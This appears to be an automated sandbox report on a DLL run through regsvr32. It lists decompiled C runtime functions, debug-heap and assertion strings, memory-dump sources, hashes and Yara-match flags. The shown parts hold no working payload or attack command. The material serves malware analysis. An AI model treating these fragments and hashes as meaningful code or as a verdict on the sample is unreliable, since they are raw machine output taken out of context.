                                                                                                                                            • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                                                                                                            • API String ID: 4197005980-4190456261
                                                                                                                                            • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                                                                            • Instruction ID: 4669e9a77e1b92dc1b163aa5f3b9f955073be058efdeb803ad3a23f2aa5b9e1e
                                                                                                                                            • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                                                                            • Instruction Fuzzy Hash: 40422D3290CA9AD5EB34CF10E5543EA6361FB88B44FA04A36D58D43AD9DF7CE149CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                            • API String ID: 2256938910-232180764
                                                                                                                                            • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                                                                            • Instruction ID: 823753bfc6d0ba9c0ba7909afd9f0ca02816614d9e681038d1f2c240264f57a5
                                                                                                                                            • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                                                                            • Instruction Fuzzy Hash: B381FB3190CBAAD6E7649F15F94436A73A0FB85B84F600935D58E467E8DF7CE488CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                                                                                                            • API String ID: 0-1181733849
                                                                                                                                            • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                                                                                            • Instruction ID: b8b5c6db35b4f784a47d7e36b2c060ec7ba4d648196a49672d49375aca942fd7
                                                                                                                                            • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                                                                                                            • Instruction Fuzzy Hash: 48422D32A0CB69D6E7648F55E58036AB7A0FF89B94F204935DA9D83BA4DF3DD440CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 00007FFC65CF54F7, 00007FFC65CF556D, 00007FFC65CF57FE
                                                                                                                                            • _CrtIsValidHeapPointer(pUserData), xrefs: 00007FFC65CF54E2
                                                                                                                                            • Client hook free failure., xrefs: 00007FFC65CF54A0
                                                                                                                                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFC65CF5683
                                                                                                                                            • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 00007FFC65CF57E9
                                                                                                                                            • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 00007FFC65CF5558
                                                                                                                                            • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 00007FFC65CF542B
                                                                                                                                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFC65CF579F
                                                                                                                                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF573C
                                                                                                                                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF5620
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapPointerValid_free_base
                                                                                                                                            • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                                                                                                            • API String ID: 1656799702-182684663
                                                                                                                                            • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                                                                            • Instruction ID: 97715fed2257f99ea17a5120bb727e64211085edd6c3ea1a34957c8d3eb879aa
                                                                                                                                            • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                                                                            • Instruction Fuzzy Hash: 33C18136A1CB69D6EB248B55E48076AB7A0FF89B54F204936EB4D43B94DF7DD400CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • _heapchk fails with unknown return value!, xrefs: 00007FFC65CF5DAF
                                                                                                                                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFC65CF5F42
                                                                                                                                            • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF60C7
                                                                                                                                            • _heapchk fails with _HEAPBADNODE., xrefs: 00007FFC65CF5D19
                                                                                                                                            • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 00007FFC65CF60FA
                                                                                                                                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFC65CF6030
                                                                                                                                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF5FE7
                                                                                                                                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF5EF9
                                                                                                                                            • _heapchk fails with _HEAPBADEND., xrefs: 00007FFC65CF5D4D
                                                                                                                                            • _heapchk fails with _HEAPBADBEGIN., xrefs: 00007FFC65CF5CE5
                                                                                                                                            • _1, xrefs: 00007FFC65CF61FC
                                                                                                                                            • _heapchk fails with _HEAPBADPTR., xrefs: 00007FFC65CF5D7E
                                                                                                                                            • DAMAGED, xrefs: 00007FFC65CF5E7D
                                                                                                                                            • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF617C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                                                                                                            • API String ID: 0-510578482
                                                                                                                                            • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                                                                                            • Instruction ID: 7c899909d9f2264fd71cb4f0c55caed029028e20372787fc508ada8fbcd0f96b
                                                                                                                                            • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                                                                                                            • Instruction Fuzzy Hash: 57E12037A1CB65D6EB24CF65E48062AB7A0FB88B54F204935EA8D43B94DF7ED041CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: E$#r5|$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                                                                                                            • API String ID: 0-2241473280
                                                                                                                                            • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                                                                                            • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                                                                                                            • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                                                                                                            • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                            			E00007FFC7FFC65CF3280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                                                                                                            				void* _t7;
                                                                                                                                            				void* _t10;
                                                                                                                                            				signed long long _t15;
                                                                                                                                            				signed long long* _t16;
                                                                                                                                            				signed long long _t20;
                                                                                                                                            				signed long long _t24;
                                                                                                                                            
                                                                                                                                            				_t7 = __rcx -  *0x65d1b018; // 0x6e969b7d650c
                                                                                                                                            				if (_t7 != 0) goto 0x65cf329a;
                                                                                                                                            				asm("dec eax");
                                                                                                                                            				if ((__ecx & 0x0000ffff) != 0) goto 0x65cf3296;
                                                                                                                                            				asm("repe ret");
                                                                                                                                            				asm("dec eax");
                                                                                                                                            				goto 0x65cf3720;
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("int3");
                                                                                                                                            				asm("o16 nop [eax+eax]");
                                                                                                                                            				if (__r8 - 8 < 0) goto 0x65cf330c;
                                                                                                                                            				_t20 = __rdx * 0x1010101;
                                                                                                                                            				_t10 = __r8 - 0x40;
                                                                                                                                            				if (_t10 < 0) goto 0x65cf32ee;
                                                                                                                                            				_t15 =  ~__rcx;
                                                                                                                                            				if (_t10 == 0) goto 0x65cf32de;
                                                                                                                                            				 *__rcx = _t20;
                                                                                                                                            				_t16 = _t15 + __rcx;
                                                                                                                                            				if (_t10 != 0) goto 0x65cf3327;
                                                                                                                                            				_t24 = __r8 - _t15 & 7;
                                                                                                                                            				if (_t10 == 0) goto 0x65cf330c;
                                                                                                                                            				 *_t16 = _t20;
                                                                                                                                            				if (_t10 != 0) goto 0x65cf3300;
                                                                                                                                            				if (_t24 == 0) goto 0x65cf331b;
                                                                                                                                            				_t16[1] = __edx & 0x000000ff;
                                                                                                                                            				if (_t24 - 1 != 0) goto 0x65cf3311;
                                                                                                                                            				return __eax;
                                                                                                                                            			}









                                                                                                                                            0x7ffc65cf3280
                                                                                                                                            0x7ffc65cf3287
                                                                                                                                            0x7ffc65cf3289
                                                                                                                                            0x7ffc65cf3292
                                                                                                                                            0x7ffc65cf3294
                                                                                                                                            0x7ffc65cf3296
                                                                                                                                            0x7ffc65cf329a
                                                                                                                                            0x7ffc65cf329f
                                                                                                                                            0x7ffc65cf32a0
                                                                                                                                            0x7ffc65cf32a1
                                                                                                                                            0x7ffc65cf32a2
                                                                                                                                            0x7ffc65cf32a3
                                                                                                                                            0x7ffc65cf32a4
                                                                                                                                            0x7ffc65cf32a5
                                                                                                                                            0x7ffc65cf32a6
                                                                                                                                            0x7ffc65cf32b7
                                                                                                                                            0x7ffc65cf32c6
                                                                                                                                            0x7ffc65cf32ca
                                                                                                                                            0x7ffc65cf32ce
                                                                                                                                            0x7ffc65cf32d0
                                                                                                                                            0x7ffc65cf32d6
                                                                                                                                            0x7ffc65cf32db
                                                                                                                                            0x7ffc65cf32de
                                                                                                                                            0x7ffc65cf32ec
                                                                                                                                            0x7ffc65cf32f1
                                                                                                                                            0x7ffc65cf32f9
                                                                                                                                            0x7ffc65cf3300
                                                                                                                                            0x7ffc65cf330a
                                                                                                                                            0x7ffc65cf330f
                                                                                                                                            0x7ffc65cf3311
                                                                                                                                            0x7ffc65cf3319
                                                                                                                                            0x7ffc65cf331b

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3778485334-0
                                                                                                                                            • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                                                                            • Instruction ID: 06fcd45ea1bb0470f65f3f93d1c5127c92f75c393f79ab486fd14d37a0e9117a
                                                                                                                                            • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                                                                            • Instruction Fuzzy Hash: AF311A3590CB6AD5EB289B61F94436973A0FF49B54F600936D68D427A5DF3DE084C720
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _unlock
                                                                                                                                            • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                                                                            • API String ID: 2480363372-3680694803
                                                                                                                                            • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                                                                            • Instruction ID: 172013d09634ca95d970807af520ed338246fa4d31fa02a97be914c42869a1ce
                                                                                                                                            • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                                                                            • Instruction Fuzzy Hash: E4515032A0C66ADAF7748F24E58076A72A0FF89B54F204935D69D82BD4DF3ED444CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                                                                                                            • API String ID: 0-1298193321
                                                                                                                                            • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                                                                                            • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                                                                                                            • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                                                                                                            • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                                                                                                            • API String ID: 0-3078009748
                                                                                                                                            • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                                                                                            • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                                                                                                            • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                                                                                                            • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 33%
                                                                                                                                            			E00007FFC7FFC65CFBE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                                                                                            				intOrPtr _v4;
                                                                                                                                            				void* _v12;
                                                                                                                                            				signed long long _v24;
                                                                                                                                            				signed int _v36;
                                                                                                                                            				long long _v180;
                                                                                                                                            				long long _v184;
                                                                                                                                            				intOrPtr _v192;
                                                                                                                                            				char _v196;
                                                                                                                                            				intOrPtr _v204;
                                                                                                                                            				long _v212;
                                                                                                                                            				long long _v220;
                                                                                                                                            				long long _v228;
                                                                                                                                            				long long _v1212;
                                                                                                                                            				long long _v1308;
                                                                                                                                            				char _v1460;
                                                                                                                                            				char _v1476;
                                                                                                                                            				char _v1484;
                                                                                                                                            				int _v1492;
                                                                                                                                            				long long _v1500;
                                                                                                                                            				long long _v1508;
                                                                                                                                            				long long _v1516;
                                                                                                                                            				long long _v1524;
                                                                                                                                            				long long _v1532;
                                                                                                                                            				long long _v1540;
                                                                                                                                            				void* _t51;
                                                                                                                                            				signed long long _t80;
                                                                                                                                            				long long _t85;
                                                                                                                                            				void* _t100;
                                                                                                                                            
                                                                                                                                            				_a24 = r8d;
                                                                                                                                            				_a16 = __edx;
                                                                                                                                            				_a8 = __ecx;
                                                                                                                                            				_t80 =  *0x65d1b018; // 0x6e969b7d650c
                                                                                                                                            				_v24 = _t80 ^ _t100 - 0x00000610;
                                                                                                                                            				if (_a8 == 0xffffffff) goto 0x65cfbe8d;
                                                                                                                                            				E00007FFC7FFC65CF8D90(_t51, _a8);
                                                                                                                                            				_v184 = 0;
                                                                                                                                            				memset(__edi, 0, 0x94 << 0);
                                                                                                                                            				_v1508 =  &_v196;
                                                                                                                                            				_v1500 =  &_v1460;
                                                                                                                                            				_v1492 = 0;
                                                                                                                                            				_v212 = 0;
                                                                                                                                            				__imp__RtlCaptureContext();
                                                                                                                                            				_t85 = _v1212;
                                                                                                                                            				_v220 = _t85;
                                                                                                                                            				r8d = 0;
                                                                                                                                            				0x65d10e28();
                                                                                                                                            				_v228 = _t85;
                                                                                                                                            				if (_v228 == 0) goto 0x65cfbf64;
                                                                                                                                            				_v1516 = 0;
                                                                                                                                            				_v1524 =  &_v1476;
                                                                                                                                            				_v1532 =  &_v1484;
                                                                                                                                            				_v1540 =  &_v1460;
                                                                                                                                            				0x65d10e22();
                                                                                                                                            				goto 0x65cfbf84;
                                                                                                                                            				_v1212 = _v12;
                                                                                                                                            				_v1308 =  &_v12;
                                                                                                                                            				_v196 = _a4;
                                                                                                                                            				_v192 = _a12;
                                                                                                                                            				_v180 = _v12;
                                                                                                                                            				_v1492 = IsDebuggerPresent();
                                                                                                                                            				SetUnhandledExceptionFilter(??);
                                                                                                                                            				_v212 = UnhandledExceptionFilter(??);
                                                                                                                                            				if (_v212 != 0) goto 0x65cfbffb;
                                                                                                                                            				if (_v1492 != 0) goto 0x65cfbffb;
                                                                                                                                            				if (_v4 == 0xffffffff) goto 0x65cfbffb;
                                                                                                                                            				return E00007FFC7FFC65CF3280(E00007FFC7FFC65CF8D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                                                                                                            			}































                                                                                                                                            0x7ffc65cfbe50
                                                                                                                                            0x7ffc65cfbe55
                                                                                                                                            0x7ffc65cfbe59
                                                                                                                                            0x7ffc65cfbe65
                                                                                                                                            0x7ffc65cfbe6f
                                                                                                                                            0x7ffc65cfbe7f
                                                                                                                                            0x7ffc65cfbe88
                                                                                                                                            0x7ffc65cfbe8d
                                                                                                                                            0x7ffc65cfbeaa
                                                                                                                                            0x7ffc65cfbeb4
                                                                                                                                            0x7ffc65cfbebe
                                                                                                                                            0x7ffc65cfbec3
                                                                                                                                            0x7ffc65cfbecb
                                                                                                                                            0x7ffc65cfbedb
                                                                                                                                            0x7ffc65cfbee1
                                                                                                                                            0x7ffc65cfbee9
                                                                                                                                            0x7ffc65cfbef1
                                                                                                                                            0x7ffc65cfbf04
                                                                                                                                            0x7ffc65cfbf09
                                                                                                                                            0x7ffc65cfbf1a
                                                                                                                                            0x7ffc65cfbf1c
                                                                                                                                            0x7ffc65cfbf2a
                                                                                                                                            0x7ffc65cfbf34
                                                                                                                                            0x7ffc65cfbf3e
                                                                                                                                            0x7ffc65cfbf5d
                                                                                                                                            0x7ffc65cfbf62
                                                                                                                                            0x7ffc65cfbf6c
                                                                                                                                            0x7ffc65cfbf7c
                                                                                                                                            0x7ffc65cfbf8b
                                                                                                                                            0x7ffc65cfbf99
                                                                                                                                            0x7ffc65cfbfa8
                                                                                                                                            0x7ffc65cfbfb6
                                                                                                                                            0x7ffc65cfbfbc
                                                                                                                                            0x7ffc65cfbfcd
                                                                                                                                            0x7ffc65cfbfdc
                                                                                                                                            0x7ffc65cfbfe3
                                                                                                                                            0x7ffc65cfbfed
                                                                                                                                            0x7ffc65cfc013

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
